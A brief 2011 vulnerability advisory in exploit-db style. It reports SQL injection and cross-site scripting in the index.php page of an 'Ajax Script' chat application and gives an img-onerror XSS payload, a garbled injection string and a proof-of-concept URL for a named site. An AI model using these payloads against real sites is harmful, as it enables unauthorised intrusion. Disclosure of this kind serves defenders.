Ajax Script suffers from cross site scripting and remote SQL injection vulnerabilities.
4b9b807cf31978b23900da02089db7c0593e9b3d9d8818e73b8619fa6d5324e1
# Exploit Title: Ajax Script SQL Injection and XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
SQL Injection and XSS can be done using the POST method. Tamper data
is available.
Vulnerable Page:
index.php (SQLInjection - XSS)
Example:
##xa7 (For Sql Injection)
"/></a></><img src=eyup.gif onerror=alert(1)> (For XSS)
POC:
http://www.ajaxchat.org/chat/index.php?branch=login
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr